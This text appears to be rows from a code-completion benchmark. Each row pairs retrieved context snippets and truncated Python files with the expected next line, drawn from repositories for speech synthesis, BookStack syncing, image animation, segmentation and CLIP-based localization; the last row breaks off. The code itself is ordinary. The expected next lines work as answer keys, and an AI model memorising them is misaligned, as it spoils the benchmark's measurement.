"snippet": "def cleaned_text_to_sequence(cleaned_text, tones, language):\r\n \"\"\"Converts a string of text to a sequence of IDs corresponding to the symbols in the text.\r\n Args:\r\n text: string to convert to a sequence\r\n Returns:\r\n List of integers corresponding to the symbols in the text\r\n \"\"\"\r\n phones = [symbol_to_id[symbol] for symbol in cleaned_text]\r\n tone_start = language_tone_start_map[language]\r\n tones = [i + tone_start for i in tones]\r\n lang_ids = [language_id_map[language]] * len(phones)\r\n return phones, tones, lang_ids"
}
] | import os
import numpy as np
import onnxruntime as ort
from copy import copy
from typing import List
from dataclasses import dataclass
from log import log_instance
from config import read_config
from config import config_instance
from .text.cleaner import clean_text, cleaned_text_to_sequence
from .onnx_bert import get_bert
| 1,019 |
BERT_ENABLE = config_instance.get("bert_enable", True)
if BERT_ENABLE:
# 获取模型中包含的中文角色标记
CHINESE_CHARACTER_MARK = config_instance.get("onnx_tts_models_chinese_mark", "中文")
ONNX_PROVIDERS = [config_instance.get("onnx_providers", "CPUExecutionProvider")]
MODELS_PATH = os.path.abspath(config_instance.get("onnx_tts_models", "onnx/models"))
MODELS_BASE_NAME = os.path.basename(MODELS_PATH)
MODELS_PARENT_PATH = os.path.dirname(MODELS_PATH)
MODELS_PREFIX = os.path.join(MODELS_PATH, os.path.basename(MODELS_PATH))
ONNX_MODELS_PATH = {
"config": f"{MODELS_PARENT_PATH}/{MODELS_BASE_NAME}.json",
"enc": f"{MODELS_PREFIX}_enc_p.onnx",
"emb_g": f"{MODELS_PREFIX}_emb.onnx",
"dp": f"{MODELS_PREFIX}_dp.onnx",
"sdp": f"{MODELS_PREFIX}_sdp.onnx",
"flow": f"{MODELS_PREFIX}_flow.onnx",
"dec": f"{MODELS_PREFIX}_dec.onnx",
}
class SpeakerMap:
"""
多语言关系表
"""
def __init__(self) -> None:
log_instance.info("正在加载模型发音人多语言关系表...")
|
BERT_ENABLE = config_instance.get("bert_enable", True)
if BERT_ENABLE:
# 获取模型中包含的中文角色标记
CHINESE_CHARACTER_MARK = config_instance.get("onnx_tts_models_chinese_mark", "中文")
ONNX_PROVIDERS = [config_instance.get("onnx_providers", "CPUExecutionProvider")]
MODELS_PATH = os.path.abspath(config_instance.get("onnx_tts_models", "onnx/models"))
MODELS_BASE_NAME = os.path.basename(MODELS_PATH)
MODELS_PARENT_PATH = os.path.dirname(MODELS_PATH)
MODELS_PREFIX = os.path.join(MODELS_PATH, os.path.basename(MODELS_PATH))
ONNX_MODELS_PATH = {
"config": f"{MODELS_PARENT_PATH}/{MODELS_BASE_NAME}.json",
"enc": f"{MODELS_PREFIX}_enc_p.onnx",
"emb_g": f"{MODELS_PREFIX}_emb.onnx",
"dp": f"{MODELS_PREFIX}_dp.onnx",
"sdp": f"{MODELS_PREFIX}_sdp.onnx",
"flow": f"{MODELS_PREFIX}_flow.onnx",
"dec": f"{MODELS_PREFIX}_dec.onnx",
}
class SpeakerMap:
"""
多语言关系表
"""
def __init__(self) -> None:
log_instance.info("正在加载模型发音人多语言关系表...")
| self.map_data: dict = read_config("speakers_map.json")
| 1 | 2023-12-21 13:50:50+00:00 | 2k |
jaypyles/obsidian-to-bookstack | obsidian_to_bookstack/bookstack/collectors/remote/RemoteBookCollector.py | [
{
"identifier": "Book",
"path": "obsidian_to_bookstack/bookstack/artifacts.py",
"snippet": "class Book:\n def __init__(\n self,\n name: str,\n shelf: Shelf | None = None,\n client: Client | None = None,\n chapters: List = [],\n path: str = \"\",\n details: Dict = {},\n from_client: bool = True,\n ) -> None:\n self.path = path\n self.name = name\n self.client = client\n self.shelf = shelf\n self.chapters = chapters\n self.details = details\n if from_client:\n self.pages = []\n else:\n self._set_pages()\n\n def __str__(self) -> str:\n return self.name\n\n def _set_pages(self):\n pages = []\n chapters = []\n\n for item in os.listdir(self.path):\n item_path = os.path.join(self.path, item)\n if os.path.isdir(item_path):\n chapters.append(\n Chapter(\n path=os.path.join(self.path, item),\n name=item,\n client=self.client,\n shelf=self.shelf,\n book=self,\n from_client=False,\n )\n )\n else:\n if os.path.splitext(item)[1] == \".md\":\n pages.append(\n Page(\n path=os.path.join(self.path, item),\n name=item,\n client=self.client,\n shelf=self.shelf,\n book=self,\n )\n )\n\n self.pages = pages\n self.chapters = chapters"
},
{
"identifier": "Shelf",
"path": "obsidian_to_bookstack/bookstack/artifacts.py",
"snippet": "class Shelf:\n def __init__(\n self,\n name: str,\n client: Client | None = None,\n from_client: bool = True,\n path: str = \"\",\n details: Dict = {},\n ) -> None:\n self.path = path\n self.name = name\n self.client = client\n if from_client:\n self.books = []\n else:\n self.books = self._set_books()\n self.client_books: list[dict] = []\n self.details = details\n\n def __str__(self) -> str:\n return self.name\n\n def _set_books(self):\n books = []\n for book in os.listdir(self.path):\n if os.path.isdir(os.path.join(self.path, book)) and not book.startswith(\n \".\"\n ):\n b = Book(\n path=os.path.join(self.path, book),\n name=book,\n client=self.client,\n shelf=self,\n from_client=False,\n )\n books.append(b)\n\n return books"
},
{
"identifier": "RemoteClient",
"path": "obsidian_to_bookstack/bookstack/client.py",
"snippet": "class RemoteClient(Client):\n @abstractmethod\n def __init__(self) -> None:\n super().__init__()\n self.id = os.getenv(\"BOOKSTACK_TOKEN_ID\")\n self.secret = os.getenv(\"BOOKSTACK_TOKEN_SECRET\")\n self.base_url = os.getenv(\"BOOKSTACK_BASE_URL\")\n self.headers = {\"Authorization\": f\"Token {self.id}:{self.secret}\"}\n self.http = urllib3.PoolManager()\n\n def _make_request(\n self,\n request_type: RequestType,\n endpoint: BookstackAPIEndpoints | DetailedBookstackLink,\n body=None,\n json=None,\n ) -> urllib3.BaseHTTPResponse:\n \"\"\"Make a HTTP request to a Bookstack API Endpoint\"\"\"\n\n assert self.base_url\n\n request_url = self.base_url + endpoint.value\n resp = self.http.request(\n request_type.value, request_url, headers=self.headers, body=body, json=json\n )\n return resp\n\n def _get_from_client(self, endpoint: BookstackAPIEndpoints):\n \"\"\"Make a GET request to a Bookstack API Endpoint\"\"\"\n resp = self._make_request(RequestType.GET, endpoint)\n assert resp\n\n data = json.loads(resp.data.decode())\n return data[\"data\"]"
},
{
"identifier": "RemoteCollector",
"path": "obsidian_to_bookstack/bookstack/collectors/collector.py",
"snippet": "class RemoteCollector(BaseCollector):\n def __init__(self, verbose: bool, client: RemoteClient) -> None:\n super().__init__(verbose)\n self.client = client"
},
{
"identifier": "console",
"path": "obsidian_to_bookstack/console.py",
"snippet": ""
},
{
"identifier": "con_hash",
"path": "obsidian_to_bookstack/utils.py",
"snippet": "def con_hash(key: str) -> int:\n \"\"\"Get a consistent hash of a key\"\"\"\n hash_obj = hashlib.md5(key.encode())\n hex_digest = hash_obj.hexdigest()\n return int(hex_digest, 16)"
}
] | import json
from typing import List
from obsidian_to_bookstack.bookstack.artifacts import Book, Shelf
from obsidian_to_bookstack.bookstack.client import RemoteClient
from obsidian_to_bookstack.bookstack.collectors.collector import \
RemoteCollector
from obsidian_to_bookstack.bookstack.constants import *
from obsidian_to_bookstack.console import console
from obsidian_to_bookstack.utils import con_hash | 1,432 |
class RemoteBookCollector(RemoteCollector):
def __init__(self, verbose: bool, client: RemoteClient) -> None:
super().__init__(verbose, client)
def get_books(self, shelves: List[Shelf]):
"""Get remote books from shelves"""
client_books = self.client._get_from_client(BookstackAPIEndpoints.BOOKS)
for book in client_books:
class DetailedBook(DetailedBookstackLink):
LINK = f"/api/books/{book['id']}"
details = json.loads(
self.client._make_request(
RequestType.GET,
DetailedBook.LINK,
).data.decode()
)
book["details"] = details
books = [Book(book["name"], details=book["details"]) for book in client_books]
BOOK_MAP = {
con_hash(book.name + str(book.details["id"])): book for book in books
}
for shelf in shelves:
for book in shelf.client_books:
b = BOOK_MAP.get(con_hash(book["name"] + str(book["id"])))
if b:
b.shelf = shelf
shelf.books.append(b)
if self.verbose:
|
class RemoteBookCollector(RemoteCollector):
def __init__(self, verbose: bool, client: RemoteClient) -> None:
super().__init__(verbose, client)
def get_books(self, shelves: List[Shelf]):
"""Get remote books from shelves"""
client_books = self.client._get_from_client(BookstackAPIEndpoints.BOOKS)
for book in client_books:
class DetailedBook(DetailedBookstackLink):
LINK = f"/api/books/{book['id']}"
details = json.loads(
self.client._make_request(
RequestType.GET,
DetailedBook.LINK,
).data.decode()
)
book["details"] = details
books = [Book(book["name"], details=book["details"]) for book in client_books]
BOOK_MAP = {
con_hash(book.name + str(book.details["id"])): book for book in books
}
for shelf in shelves:
for book in shelf.client_books:
b = BOOK_MAP.get(con_hash(book["name"] + str(book["id"])))
if b:
b.shelf = shelf
shelf.books.append(b)
if self.verbose: | console.log(f"Found remote book: {b}") | 4 | 2023-12-20 02:22:33+00:00 | 2k |
MingtaoGuo/AnimateAnyone_unofficial | tutorial_train_animate.py | [
{
"identifier": "MyDataset",
"path": "tutorial_dataset.py",
"snippet": "class MyDataset(Dataset):\n def __init__(self, path=\"/mnt/gmt/Dataset/\"):\n self.path = path\n self.videos = os.listdir(path + \"fashion_png\")\n\n def __len__(self):\n return len(self.videos) * 10\n\n def __getitem__(self, idx):\n video_name = np.random.choice(self.videos)\n frames = np.random.choice(os.listdir(self.path + \"/fashion_png/\" + video_name), [2])\n ref_frame, tgt_frame = frames[0], frames[1]\n ref_bgr = cv2.imread(self.path + \"/fashion_png/\" + video_name + \"/\" + ref_frame)\n # ref_bgr = cv2.resize(ref_bgr, (256, 256))\n ref_rgb = cv2.cvtColor(ref_bgr, cv2.COLOR_BGR2RGB)\n ref_rgb = (ref_rgb.astype(np.float32) / 127.5) - 1.0\n\n tgt_bgr = cv2.imread(self.path + \"/fashion_png/\" + video_name + \"/\" + tgt_frame)\n # tgt_bgr = cv2.resize(tgt_bgr, (256, 256))\n tgt_rgb = cv2.cvtColor(tgt_bgr, cv2.COLOR_BGR2RGB)\n tgt_rgb = (tgt_rgb.astype(np.float32) / 127.5) - 1.0\n\n skt_bgr = cv2.imread(self.path + \"/fashion_pose/\" + video_name + \"/\" + tgt_frame)\n # skt_bgr = cv2.resize(skt_bgr, (256, 256))\n skt_rgb = cv2.cvtColor(skt_bgr, cv2.COLOR_BGR2RGB)\n skt_rgb = skt_rgb.astype(np.float32) / 255.0\n\n return dict(target=tgt_rgb, vision=ref_rgb, reference=ref_rgb, skeleton=skt_rgb)"
},
{
"identifier": "ImageLogger",
"path": "aldm/logger.py",
"snippet": "class ImageLogger(Callback):\n def __init__(self, batch_frequency=2000, max_images=4, clamp=True, increase_log_steps=True,\n rescale=True, disabled=False, log_on_batch_idx=False, log_first_step=False,\n log_images_kwargs=None):\n super().__init__()\n self.rescale = rescale\n self.batch_freq = batch_frequency\n self.max_images = max_images\n if not increase_log_steps:\n self.log_steps = [self.batch_freq]\n self.clamp = clamp\n self.disabled = disabled\n self.log_on_batch_idx = log_on_batch_idx\n self.log_images_kwargs = log_images_kwargs if log_images_kwargs else {}\n self.log_first_step = log_first_step\n\n @rank_zero_only\n def log_local(self, save_dir, split, images, global_step, current_epoch, batch_idx):\n root = os.path.join(save_dir, \"image_log\", split)\n for k in images:\n grid = torchvision.utils.make_grid(images[k], nrow=4)\n if self.rescale:\n grid = (grid + 1.0) / 2.0 # -1,1 -> 0,1; c,h,w\n grid = grid.transpose(0, 1).transpose(1, 2).squeeze(-1)\n grid = grid.numpy()\n grid = (grid * 255).astype(np.uint8)\n filename = \"{}_gs-{:06}_e-{:06}_b-{:06}.png\".format(k, global_step, current_epoch, batch_idx)\n path = os.path.join(root, filename)\n os.makedirs(os.path.split(path)[0], exist_ok=True)\n Image.fromarray(grid).save(path)\n\n def log_img(self, pl_module, batch, batch_idx, split=\"train\"):\n check_idx = batch_idx # if self.log_on_batch_idx else pl_module.global_step\n if (self.check_frequency(check_idx) and # batch_idx % self.batch_freq == 0\n hasattr(pl_module, \"log_images\") and\n callable(pl_module.log_images) and\n self.max_images > 0):\n logger = type(pl_module.logger)\n\n is_train = pl_module.training\n if is_train:\n pl_module.eval()\n\n with torch.no_grad():\n images = pl_module.log_images(batch, split=split, **self.log_images_kwargs)\n\n for k in images:\n N = min(images[k].shape[0], self.max_images)\n images[k] = images[k][:N]\n if isinstance(images[k], torch.Tensor):\n images[k] = images[k].detach().cpu()\n if self.clamp:\n images[k] = torch.clamp(images[k], -1., 1.)\n\n self.log_local(pl_module.logger.save_dir, split, images,\n pl_module.global_step, pl_module.current_epoch, batch_idx)\n\n if is_train:\n pl_module.train()\n\n def check_frequency(self, check_idx):\n return check_idx % self.batch_freq == 0\n\n def on_train_batch_end(self, trainer, pl_module, outputs, batch, batch_idx, dataloader_idx):\n if not self.disabled:\n self.log_img(pl_module, batch, batch_idx, split=\"train\")"
},
{
"identifier": "create_model",
"path": "aldm/model.py",
"snippet": "def create_model(config_path):\n config = OmegaConf.load(config_path)\n model = instantiate_from_config(config.model).cpu()\n print(f'Loaded model config from [{config_path}]')\n return model"
},
{
"identifier": "load_state_dict",
"path": "aldm/model.py",
"snippet": "def load_state_dict(ckpt_path, location='cpu'):\n _, extension = os.path.splitext(ckpt_path)\n if extension.lower() == \".safetensors\":\n import safetensors.torch\n state_dict = safetensors.torch.load_file(ckpt_path, device=location)\n else:\n state_dict = get_state_dict(torch.load(ckpt_path, map_location=torch.device(location)))\n state_dict = get_state_dict(state_dict)\n print(f'Loaded state_dict from [{ckpt_path}]')\n return state_dict"
}
] | from share import *
from torch.utils.data import DataLoader
from tutorial_dataset import MyDataset
from aldm.logger import ImageLogger
from aldm.model import create_model, load_state_dict
import pytorch_lightning as pl | 1,547 |
# Configs
resume_path = './models/reference_sd15_ini.ckpt'
batch_size = 2
logger_freq = 300
learning_rate = 1e-5
# First use cpu to load models. Pytorch Lightning will automatically move it to GPUs.
model = create_model('./models/aldm_v15.yaml').cpu()
model.load_state_dict(load_state_dict(resume_path, location='cpu'))
model.learning_rate = learning_rate
# Misc
|
# Configs
resume_path = './models/reference_sd15_ini.ckpt'
batch_size = 2
logger_freq = 300
learning_rate = 1e-5
# First use cpu to load models. Pytorch Lightning will automatically move it to GPUs.
model = create_model('./models/aldm_v15.yaml').cpu()
model.load_state_dict(load_state_dict(resume_path, location='cpu'))
model.learning_rate = learning_rate
# Misc | dataset = MyDataset() | 0 | 2023-12-16 03:31:33+00:00 | 2k |
yasserben/CLOUDS | clouds/modeling/meta_arch/clouds_head.py | [
{
"identifier": "build_transformer_decoder",
"path": "clouds/modeling/transformer_decoder/clouds_transformer_decoder.py",
"snippet": "def build_transformer_decoder(cfg, in_channels, mask_classification=True):\n \"\"\"\n Build a instance embedding branch from `cfg.MODEL.INS_EMBED_HEAD.NAME`.\n \"\"\"\n name = cfg.MODEL.MASK_FORMER.TRANSFORMER_DECODER_NAME\n return TRANSFORMER_DECODER_REGISTRY.get(name)(cfg, in_channels, mask_classification)"
},
{
"identifier": "build_original_transformer_decoder",
"path": "clouds/modeling/transformer_decoder/mask2former_transformer_decoder.py",
"snippet": "def build_original_transformer_decoder(cfg, in_channels, mask_classification=True):\n \"\"\"\n Build a instance embedding branch from `cfg.MODEL.INS_EMBED_HEAD.NAME`.\n \"\"\"\n name = cfg.MODEL.MASK_FORMER.TRANSFORMER_DECODER_NAME\n return TRANSFORMER_DECODER_REGISTRY.get(name)(cfg, in_channels, mask_classification)"
},
{
"identifier": "build_bis_transformer_decoder",
"path": "clouds/modeling/transformer_decoder/clouds_bis_transformer_decoder.py",
"snippet": "def build_bis_transformer_decoder(cfg, in_channels, mask_classification=True):\n \"\"\"\n Build a instance embedding branch from `cfg.MODEL.INS_EMBED_HEAD.NAME`.\n \"\"\"\n name = cfg.MODEL.MASK_FORMER.TRANSFORMER_DECODER_NAME\n return TRANSFORMER_DECODER_REGISTRY.get(name)(cfg, in_channels, mask_classification)"
},
{
"identifier": "build_pixel_decoder",
"path": "clouds/modeling/pixel_decoder/msdeformattn.py",
"snippet": "def build_pixel_decoder(cfg, input_shape):\n \"\"\"\n Build a pixel decoder from `cfg.MODEL.ONE_FORMER.PIXEL_DECODER_NAME`.\n \"\"\"\n name = cfg.MODEL.SEM_SEG_HEAD.PIXEL_DECODER_NAME\n model = SEM_SEG_HEADS_REGISTRY.get(name)(cfg, input_shape)\n forward_features = getattr(model, \"forward_features\", None)\n if not callable(forward_features):\n raise ValueError(\n \"Only SEM_SEG_HEADS with forward_features method can be used as pixel decoder. \"\n f\"Please implement forward_features for {name} to only return mask features.\"\n )\n return model"
}
] | import logging
import fvcore.nn.weight_init as weight_init
from copy import deepcopy
from typing import Callable, Dict, List, Optional, Tuple, Union
from torch import nn
from torch.nn import functional as F
from detectron2.config import configurable
from detectron2.layers import Conv2d, ShapeSpec, get_norm
from detectron2.modeling import SEM_SEG_HEADS_REGISTRY
from ..transformer_decoder.clouds_transformer_decoder import build_transformer_decoder
from ..transformer_decoder.mask2former_transformer_decoder import (
build_original_transformer_decoder,
)
from ..transformer_decoder.clouds_bis_transformer_decoder import (
build_bis_transformer_decoder,
)
from ..pixel_decoder.msdeformattn import build_pixel_decoder | 1,202 | """
Copyright 2023 Telecom Paris, Yasser BENIGMIM. All rights reserved.
Licensed under the Apache License, Version 2.0
Reference: https://github.com/facebookresearch/Mask2Former/blob/main/mask2former/modeling/meta_arch/mask_former_head.py
"""
@SEM_SEG_HEADS_REGISTRY.register()
class CLOUDSHead(nn.Module):
@configurable
def __init__(
self,
input_shape: Dict[str, ShapeSpec],
*,
num_classes: int,
pixel_decoder: nn.Module,
loss_weight: float = 1.0,
ignore_value: int = -1,
# extra parameters
transformer_predictor: nn.Module,
transformer_in_feature: str,
name_transformer_predictor: str,
):
"""
NOTE: this interface is experimental.
Args:
input_shape: shapes (channels and stride) of the input features
num_classes: number of classes to predict
pixel_decoder: the pixel decoder module
loss_weight: loss weight
ignore_value: category id to be ignored during training.
transformer_predictor: the transformer decoder that makes prediction
transformer_in_feature: input feature name to the transformer_predictor
"""
super().__init__()
input_shape = sorted(input_shape.items(), key=lambda x: x[1].stride)
self.in_features = [k for k, v in input_shape]
feature_strides = [v.stride for k, v in input_shape]
feature_channels = [v.channels for k, v in input_shape]
self.ignore_value = ignore_value
self.common_stride = 4
self.loss_weight = loss_weight
self.pixel_decoder = pixel_decoder
self.predictor = transformer_predictor
self.transformer_in_feature = transformer_in_feature
self.num_classes = num_classes
self.name_transformer_predictor = name_transformer_predictor
@classmethod
def from_config(cls, cfg, input_shape: Dict[str, ShapeSpec]):
# figure out in_channels to transformer predictor
if cfg.MODEL.MASK_FORMER.TRANSFORMER_IN_FEATURE == "multi_scale_pixel_decoder":
transformer_predictor_in_channels = cfg.MODEL.SEM_SEG_HEAD.CONVS_DIM
else:
raise NotImplementedError
if (
cfg.MODEL.MASK_FORMER.TRANSFORMER_DECODER_NAME
== "MultiScaleMaskedTransformerDecoder"
):
return {
"input_shape": {
k: v
for k, v in input_shape.items()
if k in cfg.MODEL.SEM_SEG_HEAD.IN_FEATURES
},
"ignore_value": cfg.MODEL.SEM_SEG_HEAD.IGNORE_VALUE,
"num_classes": cfg.MODEL.SEM_SEG_HEAD.NUM_CLASSES,
| """
Copyright 2023 Telecom Paris, Yasser BENIGMIM. All rights reserved.
Licensed under the Apache License, Version 2.0
Reference: https://github.com/facebookresearch/Mask2Former/blob/main/mask2former/modeling/meta_arch/mask_former_head.py
"""
@SEM_SEG_HEADS_REGISTRY.register()
class CLOUDSHead(nn.Module):
@configurable
def __init__(
self,
input_shape: Dict[str, ShapeSpec],
*,
num_classes: int,
pixel_decoder: nn.Module,
loss_weight: float = 1.0,
ignore_value: int = -1,
# extra parameters
transformer_predictor: nn.Module,
transformer_in_feature: str,
name_transformer_predictor: str,
):
"""
NOTE: this interface is experimental.
Args:
input_shape: shapes (channels and stride) of the input features
num_classes: number of classes to predict
pixel_decoder: the pixel decoder module
loss_weight: loss weight
ignore_value: category id to be ignored during training.
transformer_predictor: the transformer decoder that makes prediction
transformer_in_feature: input feature name to the transformer_predictor
"""
super().__init__()
input_shape = sorted(input_shape.items(), key=lambda x: x[1].stride)
self.in_features = [k for k, v in input_shape]
feature_strides = [v.stride for k, v in input_shape]
feature_channels = [v.channels for k, v in input_shape]
self.ignore_value = ignore_value
self.common_stride = 4
self.loss_weight = loss_weight
self.pixel_decoder = pixel_decoder
self.predictor = transformer_predictor
self.transformer_in_feature = transformer_in_feature
self.num_classes = num_classes
self.name_transformer_predictor = name_transformer_predictor
@classmethod
def from_config(cls, cfg, input_shape: Dict[str, ShapeSpec]):
# figure out in_channels to transformer predictor
if cfg.MODEL.MASK_FORMER.TRANSFORMER_IN_FEATURE == "multi_scale_pixel_decoder":
transformer_predictor_in_channels = cfg.MODEL.SEM_SEG_HEAD.CONVS_DIM
else:
raise NotImplementedError
if (
cfg.MODEL.MASK_FORMER.TRANSFORMER_DECODER_NAME
== "MultiScaleMaskedTransformerDecoder"
):
return {
"input_shape": {
k: v
for k, v in input_shape.items()
if k in cfg.MODEL.SEM_SEG_HEAD.IN_FEATURES
},
"ignore_value": cfg.MODEL.SEM_SEG_HEAD.IGNORE_VALUE,
"num_classes": cfg.MODEL.SEM_SEG_HEAD.NUM_CLASSES, | "pixel_decoder": build_pixel_decoder(cfg, input_shape), | 3 | 2023-12-15 15:40:58+00:00 | 2k |
linyq2117/TagCLIP | CLIP-ES/generate_cams_coco.py | [
{
"identifier": "scoremap2bbox",
"path": "utils.py",
"snippet": "def scoremap2bbox(scoremap, threshold, multi_contour_eval=False):\n height, width = scoremap.shape\n scoremap_image = np.expand_dims((scoremap * 255).astype(np.uint8), 2)\n _, thr_gray_heatmap = cv2.threshold(\n src=scoremap_image,\n thresh=int(threshold * np.max(scoremap_image)),\n maxval=255,\n type=cv2.THRESH_BINARY)\n contours = cv2.findContours(\n image=thr_gray_heatmap,\n mode=cv2.RETR_EXTERNAL,\n method=cv2.CHAIN_APPROX_SIMPLE)[_CONTOUR_INDEX]\n\n if len(contours) == 0:\n return np.asarray([[0, 0, 0, 0]]), 1\n\n if not multi_contour_eval:\n contours = [max(contours, key=cv2.contourArea)]\n\n estimated_boxes = []\n for contour in contours:\n x, y, w, h = cv2.boundingRect(contour)\n x0, y0, x1, y1 = x, y, x + w, y + h\n x1 = min(x1, width - 1)\n y1 = min(y1, height - 1)\n estimated_boxes.append([x0, y0, x1, y1])\n\n return np.asarray(estimated_boxes), len(contours)"
},
{
"identifier": "class_names",
"path": "clip_text.py",
"snippet": "BACKGROUND_CATEGORY_VOC = ['ground','land','grass','tree','building','wall','sky','lake','water','river','sea','railway','railroad','keyboard','helmet',\n 'cloud','house','mountain','ocean','road','rock','street','valley','bridge','sign',\n ]\nBACKGROUND_CATEGORY_COCO = ['ground','land','grass','tree','building','wall','sky','lake','water','river','sea','railway','railroad','helmet',\n 'cloud','house','mountain','ocean','road','rock','street','valley','bridge',\n ]"
}
] | from pytorch_grad_cam import GradCAM
from PIL import Image
from tqdm import tqdm
from pytorch_grad_cam.utils.image import scale_cam_image
from utils import scoremap2bbox
from clip_text import class_names, new_class_names_coco, BACKGROUND_CATEGORY_COCO
from torch import multiprocessing
from torchvision.transforms import Compose, Resize, CenterCrop, ToTensor, Normalize, RandomHorizontalFlip
from torchvision.transforms import InterpolationMode
import torch
import clip
import numpy as np
import cv2
import os
import argparse
import warnings | 1,508 | # -*- coding:UTF-8 -*-
try:
BICUBIC = InterpolationMode.BICUBIC
except ImportError:
BICUBIC = Image.BICUBIC
warnings.filterwarnings("ignore")
_CONTOUR_INDEX = 1 if cv2.__version__.split('.')[0] == '3' else 0
def reshape_transform(tensor, height=28, width=28):
tensor = tensor.permute(1, 0, 2)
result = tensor[:, 1:, :].reshape(tensor.size(0), height, width, tensor.size(2))
# Bring the channels to the first dimension,
# like in CNNs.
result = result.transpose(2, 3).transpose(1, 2)
return result
def split_dataset(dataset, all_label_list, n_splits):
if n_splits == 1:
return [dataset], [all_label_list]
part = len(dataset) // n_splits
dataset_list = []
split_label_list = []
for i in range(n_splits - 1):
dataset_list.append(dataset[i*part:(i+1)*part])
split_label_list.append(all_label_list[i*part:(i+1)*part])
dataset_list.append(dataset[(i+1)*part:])
split_label_list.append(all_label_list[(i+1)*part:])
return dataset_list, split_label_list
def zeroshot_classifier(classnames, templates, model):
with torch.no_grad():
zeroshot_weights = []
for classname in classnames:
texts = [template.format(classname) for template in templates] #format with class
texts = clip.tokenize(texts).to(device) #tokenize
class_embeddings = model.encode_text(texts) #embed with text encoder
class_embeddings /= class_embeddings.norm(dim=-1, keepdim=True)
class_embedding = class_embeddings.mean(dim=0)
class_embedding /= class_embedding.norm()
zeroshot_weights.append(class_embedding)
zeroshot_weights = torch.stack(zeroshot_weights, dim=1).to(device)
return zeroshot_weights.t()
class ClipOutputTarget:
def __init__(self, category):
self.category = category
def __call__(self, model_output):
if len(model_output.shape) == 1:
return model_output[self.category]
return model_output[:, self.category]
def _convert_image_to_rgb(image):
return image.convert("RGB")
def _transform_resize(h, w):
return Compose([
Resize((h,w), interpolation=BICUBIC),
_convert_image_to_rgb,
ToTensor(),
Normalize((0.48145466, 0.4578275, 0.40821073), (0.26862954, 0.26130258, 0.27577711)),
])
def img_ms_and_flip(img_path, ori_height, ori_width, scales=[1.0], patch_size=16):
all_imgs = []
for scale in scales:
preprocess = _transform_resize(int(np.ceil(scale * int(ori_height) / patch_size) * patch_size), int(np.ceil(scale * int(ori_width) / patch_size) * patch_size))
image = preprocess(Image.open(img_path))
image_ori = image
image_flip = torch.flip(image, [-1])
all_imgs.append(image_ori)
all_imgs.append(image_flip)
return all_imgs
def perform(process_id, dataset_list, args, model, bg_text_features, fg_text_features, cam, split_label_list):
n_gpus = torch.cuda.device_count()
device_id = "cuda:{}".format(process_id % n_gpus)
databin = dataset_list[process_id]
all_label_list = split_label_list[process_id]
model = model.to(device_id)
bg_text_features = bg_text_features.to(device_id)
fg_text_features = fg_text_features.to(device_id)
for im_idx, im in enumerate(tqdm(databin)):
img_path = os.path.join(args.img_root, im)
ori_image = Image.open(img_path)
ori_height, ori_width = np.asarray(ori_image).shape[:2]
label_id_list = all_label_list[im_idx]
label_list = []
for lid in label_id_list:
| # -*- coding:UTF-8 -*-
try:
BICUBIC = InterpolationMode.BICUBIC
except ImportError:
BICUBIC = Image.BICUBIC
warnings.filterwarnings("ignore")
_CONTOUR_INDEX = 1 if cv2.__version__.split('.')[0] == '3' else 0
def reshape_transform(tensor, height=28, width=28):
tensor = tensor.permute(1, 0, 2)
result = tensor[:, 1:, :].reshape(tensor.size(0), height, width, tensor.size(2))
# Bring the channels to the first dimension,
# like in CNNs.
result = result.transpose(2, 3).transpose(1, 2)
return result
def split_dataset(dataset, all_label_list, n_splits):
if n_splits == 1:
return [dataset], [all_label_list]
part = len(dataset) // n_splits
dataset_list = []
split_label_list = []
for i in range(n_splits - 1):
dataset_list.append(dataset[i*part:(i+1)*part])
split_label_list.append(all_label_list[i*part:(i+1)*part])
dataset_list.append(dataset[(i+1)*part:])
split_label_list.append(all_label_list[(i+1)*part:])
return dataset_list, split_label_list
def zeroshot_classifier(classnames, templates, model):
with torch.no_grad():
zeroshot_weights = []
for classname in classnames:
texts = [template.format(classname) for template in templates] #format with class
texts = clip.tokenize(texts).to(device) #tokenize
class_embeddings = model.encode_text(texts) #embed with text encoder
class_embeddings /= class_embeddings.norm(dim=-1, keepdim=True)
class_embedding = class_embeddings.mean(dim=0)
class_embedding /= class_embedding.norm()
zeroshot_weights.append(class_embedding)
zeroshot_weights = torch.stack(zeroshot_weights, dim=1).to(device)
return zeroshot_weights.t()
class ClipOutputTarget:
def __init__(self, category):
self.category = category
def __call__(self, model_output):
if len(model_output.shape) == 1:
return model_output[self.category]
return model_output[:, self.category]
def _convert_image_to_rgb(image):
return image.convert("RGB")
def _transform_resize(h, w):
return Compose([
Resize((h,w), interpolation=BICUBIC),
_convert_image_to_rgb,
ToTensor(),
Normalize((0.48145466, 0.4578275, 0.40821073), (0.26862954, 0.26130258, 0.27577711)),
])
def img_ms_and_flip(img_path, ori_height, ori_width, scales=[1.0], patch_size=16):
all_imgs = []
for scale in scales:
preprocess = _transform_resize(int(np.ceil(scale * int(ori_height) / patch_size) * patch_size), int(np.ceil(scale * int(ori_width) / patch_size) * patch_size))
image = preprocess(Image.open(img_path))
image_ori = image
image_flip = torch.flip(image, [-1])
all_imgs.append(image_ori)
all_imgs.append(image_flip)
return all_imgs
def perform(process_id, dataset_list, args, model, bg_text_features, fg_text_features, cam, split_label_list):
n_gpus = torch.cuda.device_count()
device_id = "cuda:{}".format(process_id % n_gpus)
databin = dataset_list[process_id]
all_label_list = split_label_list[process_id]
model = model.to(device_id)
bg_text_features = bg_text_features.to(device_id)
fg_text_features = fg_text_features.to(device_id)
for im_idx, im in enumerate(tqdm(databin)):
img_path = os.path.join(args.img_root, im)
ori_image = Image.open(img_path)
ori_height, ori_width = np.asarray(ori_image).shape[:2]
label_id_list = all_label_list[im_idx]
label_list = []
for lid in label_id_list: | label_list.append(new_class_names_coco[int(lid)]) | 0 | 2023-12-21 03:20:47+00:00 | 2k |
cypypccpy/dynamic_handover | dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/policy_network/vae_policy.py | [
{
"identifier": "POLICYNETWORKS",
"path": "dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/builder.py",
"snippet": "POLICYNETWORKS = Registry('policy_network')"
},
{
"identifier": "build_backbone",
"path": "dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/builder.py",
"snippet": "def build_backbone(cfg):\n return build(cfg, BACKBONES)"
},
{
"identifier": "build_dense_head",
"path": "dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/builder.py",
"snippet": "def build_dense_head(cfg):\n return build(cfg, DENSEHEADS)"
},
{
"identifier": "replace_placeholder_with_args",
"path": "dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/utils.py",
